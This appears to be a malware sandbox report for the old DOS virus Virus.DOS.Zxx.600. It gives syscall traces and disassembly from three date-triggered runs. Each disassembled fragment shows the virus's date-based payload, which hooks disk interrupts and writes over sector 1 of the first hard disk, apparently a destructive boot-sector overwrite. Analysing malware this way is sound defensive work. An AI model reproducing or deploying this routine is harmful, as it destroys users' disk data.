Sample viewer

vx.netlux.org/Virus.DOS.Zxx.600

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:25:27.573006265Z 48 PC: 12c4e | Get DOS version
2018-12-17T22:25:27.57795665Z 42 PC: 12c56 | Get date
0x12c56: cmp dh, 8
0x12c59: jb 0x12c75
0x12c5b: mov ah, 0x13
0x12c5d: int 0x2f
0x12c5f: mov ax, 0x2513
0x12c62: int 0x21
0x12c64: mov ah, 0x13
0x12c66: int 0x2f
0x12c68: mov dx, 0x80
0x12c6b: mov cx, 1
0x12c6e: mov ax, 0x301
0x12c71: int 0x13
0x12c73: jmp 0x12cc0
0x12c75: xor di, di
0x12c77: mov es, di
0x12c79: mov es, word ptr es:[0x540]
0x12c7e: xor si, si
0x12c80: mov cx, 0x14
0x12c83: repe cmpsb byte ptr [si], byte ptr es:[di]
0x12c85: je 0x12cc0
2018-12-17T22:25:27.580813444Z 37 PC: 12c64 | Set interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-17T22:25:27.911695389Z 9 PC: 12c22 | Display string (Could not find end pointer)
2018-12-17T22:25:27.917722585Z 76 PC: 12c28 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":4495,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:51:54.768424928Z 48 PC: 12c4e | Get DOS version
2018-12-25T11:51:54.769675955Z 42 PC: 12c56 | Get date
0x12c56: cmp dh, 8
0x12c59: jb 0x12c75
0x12c5b: mov ah, 0x13
0x12c5d: int 0x2f
0x12c5f: mov ax, 0x2513
0x12c62: int 0x21
0x12c64: mov ah, 0x13
0x12c66: int 0x2f
0x12c68: mov dx, 0x80
0x12c6b: mov cx, 1
0x12c6e: mov ax, 0x301
0x12c71: int 0x13
0x12c73: jmp 0x12cc0
0x12c75: xor di, di
0x12c77: mov es, di
0x12c79: mov es, word ptr es:[0x540]
0x12c7e: xor si, si
0x12c80: mov cx, 0x14
0x12c83: repe cmpsb byte ptr [si], byte ptr es:[di]
0x12c85: je 0x12cc0
2018-12-25T11:51:54.772139645Z 9 PC: 12c22 | Display string (Could not find end pointer)
2018-12-25T11:51:54.777225751Z 76 PC: 12c28 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":8,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":4495,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:51:54.948926756Z 48 PC: 12c4e | Get DOS version
2018-12-25T11:51:54.950064056Z 42 PC: 12c56 | Get date
0x12c56: cmp dh, 8
0x12c59: jb 0x12c75
0x12c5b: mov ah, 0x13
0x12c5d: int 0x2f
0x12c5f: mov ax, 0x2513
0x12c62: int 0x21
0x12c64: mov ah, 0x13
0x12c66: int 0x2f
0x12c68: mov dx, 0x80
0x12c6b: mov cx, 1
0x12c6e: mov ax, 0x301
0x12c71: int 0x13
0x12c73: jmp 0x12cc0
0x12c75: xor di, di
0x12c77: mov es, di
0x12c79: mov es, word ptr es:[0x540]
0x12c7e: xor si, si
0x12c80: mov cx, 0x14
0x12c83: repe cmpsb byte ptr [si], byte ptr es:[di]
0x12c85: je 0x12cc0
2018-12-25T11:51:54.953645515Z 37 PC: 12c64 | Set interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T11:51:55.65523463Z 9 PC: 12c22 | Display string (Could not find end pointer)
2018-12-25T11:51:55.66212492Z 76 PC: 12c28 | Terminate with return code (Return code = '0')